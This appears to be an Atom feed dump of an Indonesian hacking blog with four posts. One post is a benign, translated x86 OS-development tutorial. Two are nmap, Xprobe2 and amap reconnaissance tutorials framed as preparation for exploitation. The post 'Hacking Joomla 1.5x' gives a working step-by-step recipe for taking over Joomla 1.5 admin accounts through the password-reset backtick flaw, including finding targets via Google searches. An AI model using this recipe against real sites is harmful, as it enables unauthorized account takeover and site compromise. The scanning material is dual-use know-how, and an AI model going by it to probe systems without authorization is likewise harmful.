href='http://neoyudhax.blogspot.com/feeds/8408275861792374395/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=8408275861792374395&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/8408275861792374395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/8408275861792374395'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2010/12/md5-cracking.html' title='MD5 CRACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-3140871797189566164</id><published>2010-12-28T10:21:00.000+07:00</published><updated>2010-12-28T15:41:25.284+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Hacking Joomla 1.5x</title><content type='html'>Please sit down and try this!&lt;br /&gt;1. Find a target:&lt;br /&gt;searching via google.com wordkey Joomla 1.5x. ex: you get : www.target.com&lt;br /&gt;2. Backdoor:&lt;br /&gt;hijack script like this on after www.target.com/:&lt;br /&gt;index.php?option=com_user&amp;amp;view=reset&amp;amp;layout=confirm&lt;br /&gt;ex: http:www.target.com/index.php?option=com_user&amp;amp;view=reset&amp;amp;layout=confirm&lt;br /&gt;3. Exploit:&lt;br /&gt;write char: ` on colom input.&lt;br /&gt;4. Enter new password admin .&lt;br /&gt;5. and &amp;nbsp;http://www.target.com/administrator/ so login. User default is admin.&lt;br /&gt;6. Game Over!&lt;br /&gt;&lt;br /&gt;ok.. lets try&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-3140871797189566164?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/3140871797189566164/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=3140871797189566164&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/3140871797189566164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/3140871797189566164'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2010/12/hacking-joomla-15x.html' title='Hacking Joomla 1.5x'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933708835820817</id><published>2005-02-25T20:10:00.000+07:00</published><updated>2010-12-26T15:10:12.000+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='OSx86'/><title type='text'>Buat Sendiri SO x86</title><content type='html'>Jadi Anda Ingin Membuat Sendiri Sistem Operasi x86? &lt;br /&gt;By Patrick Mahoney &lt;br /&gt;&lt;br /&gt;1. Perkenalan&lt;br /&gt;Salah satu kesulitan besar yang dihadapi oleh programmer hobbyist ketika mulai mencoba mengembangkan sistem operasinya sendiri adalah menentukan dari mana ia harus memulai. Banyak buku menjelaskan dengan mendalam konsep sistem operasi secara teoritis, namun tidak satu pun yang tampaknya bisa membawa programmer hobbyist untuk memahami konsep tersebut. Ini adalah apa yang akan dilakukan oleh artikel ini. &lt;br /&gt;&lt;br /&gt;Beberapa artikel yang berhubungan dengan topik ini muncul di beberapa edisi terakhir Linux Gazette. Saya merencanakan untuk melakukan pendekatan dengan menggunakan sesedikit mungkin gaya yang berorientasi pemrograman, dan hanya akan menunjukkan kepada pembaca tool dan tips yang akan ia butuhkan untuk memulai pengembangan dari sistem operasinya. Sekali ia membaca artikel ini, pembaca yang tertarik seharusnya segera mulai browsing segala sesuatu yang ia perlukan yang tersedia dan memulai untuk mendesain dan mengetikkan kode program. &lt;br /&gt;&lt;br /&gt;Anda mungkin tidak mengerti, bahwa pengembangan suatu sistem operasi tidak dimulai dari awal. (!!) Menulis sebuah bootloader yang bagus akan menjadi keseluruhan proyek itu sendiri, dan saya tidak menyarankan anda untuk memulai sebuah proyek pengembangan sistem operasi dengan menulis sebuah bootloader. Banyak bootloader yang handal tersedia dengan bebas (Grub, lilo, ppcboot, dan lain-lain...). Jika anda berencana untuk menulisnya sendiri, saya menyarankan untuk menunda pekerjaan ini pada bagian lain dari proyek. Pada artikel ini, saya akan menggunakan GNU Grub, Grand Unified Bootloader. &lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;2. Penjelasan mengenai lingkungan pengembangan&lt;br /&gt;Untuk mengurangi kesulitan pengembangan sistem operasi, anda harus melakukan pengaturan sebuah lingkungan pengembangan yang disesuaikan, yang memenuhi beberapa syarat sebagai berikut: &lt;br /&gt;&lt;br /&gt;Anda harus segera mengetes kernel yang baru saja dicompile &lt;br /&gt;Anda tidak boleh mereboot mesin yang anda gunakan untuk pengembangan &lt;br /&gt;Anda tidak boleh menggunakan floppy sebagai media penyimpanan untuk sistem operasi anda &lt;br /&gt;&lt;br /&gt;Artikel ini akan menghadirkan satu dari beberapa lingkungan yang mungkin yang sesuai dengan syarat di atas, yang terdiri dari satu mesin pengembangan dan sebuah mesin pengujian, yang keduanya berada pada jaringan yang umum. &lt;br /&gt;2.1 Mesin pengembangan&lt;br /&gt;Tak dapat dihindari, mesin ini harus dilengkapi dengan satu set tool pemrograman yang baik: compiler assembly dan C, sebuah linker dan sebuah utilitas 'make' adalah suatu keharusan. &lt;br /&gt;&lt;br /&gt;Sebuah tool yang lebih berguna daripada yang saya pikirkan adalah sebuah emulator. Tool ini akan membantu anda melakukan debug pada kernel dan akan mengijinkan anda untuk segera mengetes baris kode yang baru saja anda tambahkan. Namun jangan terlalu mudah dibodohi, sebuah emulator tidak akan bisa menggantikan sebuah mesin penguji yang bagus. &lt;br /&gt;&lt;br /&gt;Selanjutnya, anda membutuhkan sebuah server TFTP. Tool ini akan mengijinkan bootloader mesin penguji yang tftp-enabled untuk mengambil kernel dari mesin pengembangan melalui koneksi jaringan. &lt;br /&gt;2.2 Mesin penguji&lt;br /&gt;Yang dibutuhkan mesin ini adalah sebuah network card dan sebuah bootloader yang tftp-enabled yang mendukungnya. &lt;br /&gt;3. Mengatur lingkungan pengembangan&lt;br /&gt;3.1 Mesin pengembangan&lt;br /&gt;Tool programming yang dipilih adalah: &lt;br /&gt;gcc 2.95.4 &lt;br /&gt;ld 2.13.90.0.10 &lt;br /&gt;&lt;br /&gt;Bochs versi 1.4.1 adalah emulator x86 yang dipilih. Perlakuan khusus harus dilakukan untuk mengcompilenya dengan debugger mode enabled. Perintah yang digunakan adalah: &lt;br /&gt;&lt;br /&gt;$ ./configure --enable-x86-debugger&lt;br /&gt;$ make&lt;br /&gt;Agar Bochs bisa digunakan dengan baik, anda harus membuat sebuah disk image. Image ini harus memiliki sebuah bootloader dan sebuah filesystem. Ini bisa dilakukan dengan menggunakan script mkbimage. Jika anda malas untuk melakukannya sendiri, ambillah gzipped 10MB disk image ini dan tambahkan &lt;br /&gt;&lt;br /&gt;diskc: file=c.img, cyl=24, heads=16, spt=63&lt;br /&gt;pada file .bochrc. &lt;br /&gt;&lt;br /&gt;Sebagai TFTP server, saya menggunakan atftpd. Ini adalah implementasi linux-based TFTP server yang mudah digunakan. &lt;br /&gt;3.2 Mesin Penguji&lt;br /&gt;Bootloader yang dipilih adalah GNU Grub versi 0.92. Perlakuan khusus harus dilakukan untuk mengenable tftp client pada Grub untuk bisa berkomunikasi dengan network card. Mesin penguji yang saya gunakan menggunakan NE2000 ISA clone yang murah. Mengikuti instruksi netboot/README.netboot dengan hati-hati, saya menggunakan perintah ini: &lt;br /&gt;&lt;br /&gt;$ ./configure --enable-ne --enable-ne-scan=0x220&lt;br /&gt;$ make&lt;br /&gt;Ingat bahwa PnP PCI card akan lebih mudah untuk dikonfigurasi. Sekarang, anda dapat menginstal image Grub pada MBR mesin penguji atau pada floppy di mana mesin penguji anda akan diboot. Saya lebih memilih yang terakhir, karena mesin penguji juga digunakan untuk keperluan lain, dan oleh karena itu, saya memilih untuk tidak bermain-main dengan harddisknya. &lt;br /&gt;&lt;br /&gt;$ cat ./stage1/stage1 ./stage2/stage2 &amp;gt; /dev/fd0&lt;br /&gt;Sekarang tinggal memasukkan floppy pada mesin penguji untuk melihat apakah network card anda bisa dikenali. Anda bisa mengkonfigurasinya sendiri atau menggunakan dhcp server, jika ada. &lt;br /&gt;&lt;br /&gt;grub&amp;gt; dhcp&lt;br /&gt;Probing... [NE*000]&lt;br /&gt;NE2000 base 0x220, addr 00:C0:A8:4E:5A:76&lt;br /&gt;Address: 192.168.22.14&lt;br /&gt;Netmask: 255.255.255.0&lt;br /&gt;Server: 192.168.22.1&lt;br /&gt;Gateway: 192.168.22.1&lt;br /&gt;Ingat bahwa anda tidak perlu mengkonfigurasi parameter-parameter tersebut secara manual tiap kali anda melakukan boot. Lihatlah dokumentasi GNU Grub dan scipt 'grub-install' untuk lebih jelasnya. &lt;br /&gt;&lt;br /&gt;That's it! Anda siap untuk melakukan tes! &lt;br /&gt;4. Mengetes pengaturan lingkungan pengembangan anda...&lt;br /&gt;Seperti yang telah saya sebutkan, saya akan membiarkan inti pemrograman sistem operasi kepada para ahlinya. Sehingga untuk mengetes pengaturannya, kita akan menggunakan contoh kernel dari source GNU Grub yang berada di direktori /docs. &lt;br /&gt;&lt;br /&gt;Kernel tersebut dibangun dari tiga file source: boot.S, kernel.c dan multiboot.h. Anda bisa membangun kernel tersebut dengan: &lt;br /&gt;&lt;br /&gt;$ gcc -I. -c ./boot.S&lt;br /&gt;$ gcc -I. -c ./kernel.c&lt;br /&gt;$ ld ./kernel.o ./boot.o -o kernel -Ttext 100000&lt;br /&gt;Berikut adalah penjelasan singkat dan tidak lengkap. Multiboot adalah sebuah standar yang mendefinisikan sebuah cara bagi bootloader untuk melewatkan informasi menuju kernel yang akan dimuat. boot.S menerima informasi tersebut, mengeset sebuah stack (tumpukan), dan memanggil 'cmain'. Fungsi ini akan mengeset vga display, membaca informasi yang dilewatkan kepadanya, menampilkan beberapa pesan dan kemudian pergi. Lalu, boot.S kembali memegang kendali, menampilkan string 'Halted', dan memasuki loop yang tidak terbatas. Sangat sederhana, bukan? Pembaca dipersilakan untuk menggali kodenya untuk lebih detailnya. &lt;br /&gt;4.1 ...dengan Bochs&lt;br /&gt;Rencananya adalah memount disk image anda melewati sebuah loopback device, menyalin kernel anda pada filesystem image tersebut, meng-unmount image, dan menjalankan Bochs. Tentunya, anda harus menambahkan sebuah offset untuk menjalankan filesystem. Tetapi anda sudah tahu, kan? &lt;br /&gt;&lt;br /&gt;# /sbin/losetup -o 32256 /dev/loop1 ./c.img&lt;br /&gt;# /bin/mount -t ext2 /dev/loop1 /mnt/osdev/&lt;br /&gt;# cp /docs/kernel /mnt/osdev&lt;br /&gt;# umount /mnt/osdev/&lt;br /&gt;# /sbin/losetup /dev/loop1 -d&lt;br /&gt;$ bochs&lt;br /&gt;Tentunya, hal di atas dapat diotomatisasi dengan Makefile. Pada Grub, lakukan: &lt;br /&gt;&lt;br /&gt;grub&amp;gt; kernel (hd0,0)/kernel&lt;br /&gt;grub&amp;gt; boot&lt;br /&gt;&lt;br /&gt;(Klik pada gambar untuk ukuran penuh.)&lt;br /&gt;4.2 ...dengan mesin penguji anda&lt;br /&gt;Pertama, atur TFTP server anda sehingga client dapat mengambil kernel anda: &lt;br /&gt;&lt;br /&gt;# /usr/sbin/atftpd --daemon /home/bono/src/grub-0.92/docs&lt;br /&gt;Jalankan mesin penguji. Konfigurasikan koneksi jaringan anda seperti ditunjukkan di atas. Selanjutnya, tentukan alamat IP mesin pengembangan anda seperti alamat TFTP server dan lokasi dari kernel image. Ingat bahwa pilihan ini dapat diset oleh dhcp server. Akhirnya, mulailah proses boot. &lt;br /&gt;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;grub&amp;gt; tftpserver 192.168.22.36&lt;br /&gt;Address: 192.168.22.14&lt;br /&gt;Netmask: 255.255.255.0&lt;br /&gt;Server: 192.168.22.36&lt;br /&gt;Gateway: 192.168.22.1&lt;br /&gt;&lt;br /&gt;grub&amp;gt; kernel (nd)/kernel&lt;br /&gt;[Multiboot-elf, &amp;lt;0x100000:0x807:0x0&amp;gt;, &amp;lt;0x101808:0x0:0x4018&amp;gt;,&lt;br /&gt;shtab=0x106190, entry=0x100568]&lt;br /&gt;&lt;br /&gt;grub&amp;gt; boot&lt;br /&gt;Sebuah tampilan yang mirip dengan Bochs di atas akan muncul pada layar mesin penguji. &lt;br /&gt;5. Kemana lagi setelah ini&lt;br /&gt;Anda sudah begitu siap untuk memulai pengembangan sistem operasi. Banyak sekali dokumentasi yang bagus yang ada di web. Browse, kirim, tanya, dan berpikirlah. Monolithic atau micro kernel? Segmentation atau paging? &lt;br /&gt;&lt;br /&gt;Jika kebutuhan debugging anda menjadi lebih besar daripada emulator dan kernel, sebuah pengaturan yang bisa anda tambahkan pada sistem operasi adalah serial debugger. Ini bisa bermacam-macam, dari beberapa bytes yang dilemparkan ke serial port, sampai sebuah gdb-compatible remote-debugging extension. Informasi ini bisa didapatkan dan diproses oleh mesin pengembangan anda melewati sebuah null-modem serial cable. Ini adalah suatu kebiasaan yang berguna dalam pengembangan sistem operasi. &lt;br /&gt;6. Resources&lt;br /&gt;Tanenbaum' os dev book &lt;br /&gt;Buku pegangan bagi pengembangan sistem operasi &lt;br /&gt;alt.os.development &lt;br /&gt;Disana anda akan mendapatkan solusi untuk permasalahan anda! &lt;br /&gt;Freenode IRC's #osdev (irc.debian.org) &lt;br /&gt;Orang-orang yang bersahabat yang tidak pernah tidur! &lt;br /&gt;Beberapa tutorial pengembangan sistem operasi termasuk dari Tim Robinson. &lt;br /&gt;Tim pernah berada di sana! &lt;br /&gt;Pusat Resource Sistem Operasi &lt;br /&gt;BosoKernel &lt;br /&gt;Tutorial pemula x86 yang manis. (Perancis) &lt;br /&gt;Intel Architecture Software Developer's Manual Volume 3: System Programming &lt;br /&gt;Jangan meninggalkan rumah tanpanya. &lt;br /&gt;7. Terimakasih&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933708835820817?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.geocities.com/yudhadewa/Linux/OSx86.txt' title='Buat Sendiri SO x86'/><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933708835820817/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933708835820817&amp;isPopup=true' title='13 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933708835820817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933708835820817'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/buat-sendiri-so-x86.html' title='Buat Sendiri SO x86'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933679810622817</id><published>2005-02-25T20:05:00.000+07:00</published><updated>2010-12-26T15:12:34.985+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMAP tutorial'/><title type='text'>NMAP TUTORIAL ++ BAB II</title><content type='html'>Other Scanning Techniques&lt;br /&gt;&lt;br /&gt;In my opinion nmap is the most superior network scanner. But there are some newer technologies being developed that are worth mentioning.&lt;br /&gt;&lt;br /&gt;Xprobe2 ICMP based fingerprinting&lt;br /&gt;&lt;br /&gt;Xprobe is a ICMP based passive fingerprinting tool, this is a newer technique being used very successfully instead of the old TCP based fingerprinting. Xprobe uses a different ICMP response to determine what Operating system the host is running, very similar to TCP based fingerprinting  it compares it's results to a database. Another advantage of ICMP based fingerprinting is it's very fast, in most cases all it needs is one packet, unlike  nmaps TCP fingerprinting thats needs to build custom packets and is quite time consuming, ICMP does not need to craft any specific packets. Each operating system has small differences in implementations of there TCP stack and Xprobe has a database of those differences.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX xprobe2-0.1]# xprobe2 -v 192.168.0.3&lt;br /&gt;&lt;br /&gt;XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com&lt;br /&gt;&lt;br /&gt;[+] Target is 192.168.0.3&lt;br /&gt;[+] Loading modules.&lt;br /&gt;[+] Following modules are loaded:&lt;br /&gt;[x]ICMP echo (ping)&lt;br /&gt;[x]TTL distance&lt;br /&gt;[x]ICMP echo&lt;br /&gt;[x]ICMP Timestamp&lt;br /&gt;[x]ICMP Address&lt;br /&gt;[x]ICMP Info Request&lt;br /&gt;[x]ICMP port unreach&lt;br /&gt;[+] 7 modules registered&lt;br /&gt;[+] Initializing scan engine&lt;br /&gt;[+] Running scan engine&lt;br /&gt;[+] Host: 192.168.0.3 is up (Guess probability: 100%)&lt;br /&gt;[+] Target: 192.168.0.3 is alive&lt;br /&gt;[+] Primary guess:&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.5 and above" (Guess probability: 95%)&lt;br /&gt;[+] Other guesses:&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.2.x" (Guess probability: 95%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "NetBSD 1.6" (Guess probability: 87%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "Linux Kernel 2.4.0 - 2.4.4" (Guess probability: 83%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "SCO OpenServer Release 5" (Guess probability: 83%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "OpenBSD 2.5" (Guess probability: 83%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.0" (Guess probability: 83%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.1" (Guess probability: 83%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "NetBSD 1.5.2" (Guess probability: 83%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "FreeBSD 4.5" (Guess probability: 79%)&lt;br /&gt;[+] Host 192.168.0.3 Running OS: "FreeBSD 4.4" (Guess probability: 79%)&lt;br /&gt;-------------------------------------SNIP---------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Xprobe has successfully identified the operating system as linux running kernel 2.45. Thats correct. This test took about 30-60seconds so its allot faster than Nmaps -O TCP fingerprinting. The next test was how it would go against a windows XP pro box.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX xprobe2-0.1]# xprobe2 192.168.0.1&lt;br /&gt;&lt;br /&gt;XProbe2 v.0.1 Copyright (c) 2002-2003 fygrave@tigerteam.net, ofir@sys-security.com&lt;br /&gt;&lt;br /&gt;[+] Target is 192.168.0.1&lt;br /&gt;[+] Loading modules.&lt;br /&gt;[+] Following modules are loaded:&lt;br /&gt;[x]ICMP echo (ping)&lt;br /&gt;[x]TTL distance&lt;br /&gt;[x]ICMP echo&lt;br /&gt;[x]ICMP Timestamp&lt;br /&gt;[x]ICMP Address&lt;br /&gt;[x]ICMP Info Request&lt;br /&gt;[x]ICMP port unreach&lt;br /&gt;[+] 7 modules registered&lt;br /&gt;[+] Initializing scan engine&lt;br /&gt;[+] Running scan engine&lt;br /&gt;[+] Host: 192.168.0.1 is up (Guess probability: 50%)&lt;br /&gt;[+] Target: 192.168.0.1 is alive&lt;br /&gt;[+] Primary guess:&lt;br /&gt;[+] Host 192.168.0.1 Running OS: "Microsoft Windows 2000/2000SP1/2000SP2/2000SP3" (Guess probability: 58%)&lt;br /&gt;[+] Other guesses:&lt;br /&gt;[+] Host 192.168.0.1 Running OS: "Microsoft Windows XP Professional / XP Professional SP1" (Guess probability: 58%)&lt;br /&gt;--------------------------------------SNIP-----------------------------------------------------&lt;br /&gt;&lt;br /&gt;Unfortunately Xprobe failed to distinguish between xp and 2000. Nmap successfully guessed this was a xp pro box but Xprobe is giving us 6 possible versions. This is not accurate enough, if we where going to try the dcom exploit we would need to determine the exact operating system and service pack. So i suggest nmaps fingerprinting is still the most efficient, but as Xprobe grows and it's database gets updated it will be worth considering using is as a replacement, another good thing about  Xprobe does not show up in snort logs and is allot faster than nmap.&lt;br /&gt;&lt;br /&gt;Banner Grabbing&lt;br /&gt;&lt;br /&gt;Before you can attempt any type of attack on a system you need to know what operating system is running and what services are running, we can determine them with nmap and if needed Xprobe. But you also need to know what version each service is to successfully exploit it. This is where banner grabbing comes into picture, if we can determine everything the target machine is running down to each version we greatly increase our chance of successful exploitation or finding a weakness in the system.&lt;br /&gt;&lt;br /&gt;The First program we are going to look at for banner grabbing is Amap.&lt;br /&gt;&lt;br /&gt;Just issue the command amap at the command prompt and you will get the following.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX amap-4.0]# amap&lt;br /&gt;amap v4.0 (c) 2003 by van Hauser and DJ RevMoon &lt;amap-dev@thc.org&gt; www.thc.org&lt;br /&gt;Syntax: amap [-A|-B|-P] [-1buSRHUdqv] [[-m] -o &lt;file&gt;] [-D &lt;file&gt;] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i &lt;file&gt;] [target port [port] ...]&lt;br /&gt;Modes:&lt;br /&gt;-A Map applications: send triggers and analyse responses (default)&lt;br /&gt;-B Just grab banners, do not send triggers&lt;br /&gt;-P No banner or application stuff - be a (full connect) port scanner!&lt;br /&gt;Options:&lt;br /&gt;-1 Only send triggers to a port until 1st identification. Speeeeed!&lt;br /&gt;-b Print ascii banner of responses&lt;br /&gt;-i FILE Nmap machine readable outputfile to read ports from&lt;br /&gt;-u Ports specified on commandline are UDP (default is TCP)&lt;br /&gt;-S Do NOT look behind an SSL port&lt;br /&gt;-R Do NOT identify RPC service&lt;br /&gt;-H Do NOT send application triggers marked as potentially harmful&lt;br /&gt;-U Do NOT dump unrecognised responses (better for scripting)&lt;br /&gt;-d Dump all responses&lt;br /&gt;-v Verbose mode, use twice (or more!) for debug (not recommended :-)&lt;br /&gt;-q Do not report closed ports, and do not print them as unidentified&lt;br /&gt;-o FILE Write output to file FILE&lt;br /&gt;-m Make output to file (-o) machine-readable (colon-separated list)&lt;br /&gt;-c CONS Amount of parallel connections to make (default 32, max 256)&lt;br /&gt;-C RETRIES Number of reconnects on connect timeouts (see -T) (default 3)&lt;br /&gt;-T SEC Connect timeout on connection attempts in seconds (default 5)&lt;br /&gt;-t SEC Response wait timeout in seconds (default 5)&lt;br /&gt;-p PROTO Only send triggers for this protocol (e.g. ftp)&lt;br /&gt;-D FILE Read from Definitions FILE[.trig|.resp|.rpc] instead of default&lt;br /&gt;-h Print this shit&lt;br /&gt;TARGET PORT The target address and port(s) to scan (additional to -i)&lt;br /&gt;amap is a tool to identify application protocols on target ports.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As you can see amap is used to identify services or daemons and also has a banner grabbing function. Amap and Nmap go hand in hand and i find them very useful when used in conjunction with each other.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX amap-4.0]# nmap -oG amap.nmap -sT 192.168.0.4; amap -i amap.nmap.gnmap&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-08-01 01:15 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 1637 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 4.728 seconds&lt;br /&gt;amap v4.0 (www.thc.org) started at 2003-08-01 01:16:04 - APPLICATION MAP mode&lt;br /&gt;&lt;br /&gt;Protocol on 192.168.0.4:22/tcp matches ssh&lt;br /&gt;Protocol on 192.168.0.4:22/tcp matches ssh-openssh&lt;br /&gt;Protocol on 192.168.0.4:139/tcp matches netbios-session&lt;br /&gt;Protocol on 192.168.0.4:21/tcp matches ftp&lt;br /&gt;Protocol on 192.168.0.4:111/tcp matches rpc&lt;br /&gt;Protocol on 192.168.0.4:6000/tcp matches x-windows&lt;br /&gt;Protocol on 192.168.0.4:23/tcp matches telnet&lt;br /&gt;Protocol on 192.168.0.4:1024/tcp matches rpc&lt;br /&gt;Protocol on 192.168.0.4:111/tcp matches rpc-rpcbind-v2&lt;br /&gt;Protocol on 192.168.0.4:1024/tcp matches rpc-status-v1&lt;br /&gt;&lt;br /&gt;Unidentified ports: none.&lt;br /&gt;&lt;br /&gt;amap v4.0 finnished at 2003-08-01 01:16:24&lt;br /&gt;&lt;br /&gt;In the above command i used amaps abbility to greap nmaps -oG log format, so nmap scanned the target machine and identifed each open port, amap then gave us a protocol listing of what each service uses and what is actually running behind each port. But we can take this a step further and read some of the banners the above services display.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX amap-4.0]# nmap -oG amap.nmap -sT 192.168.0.4; amap -B -i amap.nmap.gnmap&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-08-01 01:43 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 1637 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 6.358 seconds&lt;br /&gt;amap v4.0 (www.thc.org) started at 2003-08-01 01:43:30 - BANNER GRAB mode&lt;br /&gt;&lt;br /&gt;Banner on 192.168.0.4:21/tcp : 220 ready, dude (vsFTPd 1.1.0 beat me, break me)\r\n&lt;br /&gt;Banner on 192.168.0.4:22/tcp : SSH-1.99-OpenSSH_3.4p1\n&lt;br /&gt;&lt;br /&gt;amap v4.0 finnished at 2003-08-01 01:43:42&lt;br /&gt;&lt;br /&gt;We only got 2 banners, and we need more banners to get a better understanding about the target machine and if it is possible to break.Amap is usfull but you can use other techniques. Another thing to note is if you know youre banners you can determine what services come default with each operating system, vsFTP 1.1.0 bundles with redhat linux 8.0.&lt;br /&gt;&lt;br /&gt;For example if there is port 80 and 443 open this usually indicates there is a web server running. I use telnet but you can use netcat also to get the webservers version.&lt;/file&gt;&lt;/file&gt;&lt;/file&gt;&lt;/amap-dev@thc.org&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933679810622817?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.geocities.com/anggota_dpr/nmaptutor.txt' title='NMAP TUTORIAL ++ BAB II'/><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933679810622817/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933679810622817&amp;isPopup=true' title='32 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933679810622817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933679810622817'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/nmap-tutorial-bab-ii.html' title='NMAP TUTORIAL ++ BAB II'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>32</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933673072765793</id><published>2005-02-25T20:03:00.000+07:00</published><updated>2010-12-26T15:15:00.805+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMAP tutorial'/><title type='text'>NMAP TUTOR ++  BAB I</title><content type='html'>Introduction to Nmap&lt;br /&gt;&lt;br /&gt;Nmap is the network exploration tool, it is essentially one of the most important tools to a security engineer or pen-tester. It is used as it's name suggests as a network exploration tool. With nmap you can probe a entire network and find out what services are listening on each specific port. Not only that but it incorporates fingerprinting  that compares different fingerprints and gives you a estimate on what operating system the machine is running. Nmap has allot of options or flags that let you manipulate how it scans, you can simply do a tcp()connect scan that makes a full connection to the host or a syn scan also known as half connection, test firewall rules and distinguish if they are firewalls or packet filters, idle scan and spoof your ip through another machine or throw out decoys to make your presence less traceable. Nmap runs on linux/bsd and windows, although we will only be discussing it's usage under linux, the windows version is just a port from linux and can still be used as a supplement if you want but you do have access to the linux version in the attack lab.&lt;br /&gt;&lt;br /&gt;Options and flags&lt;br 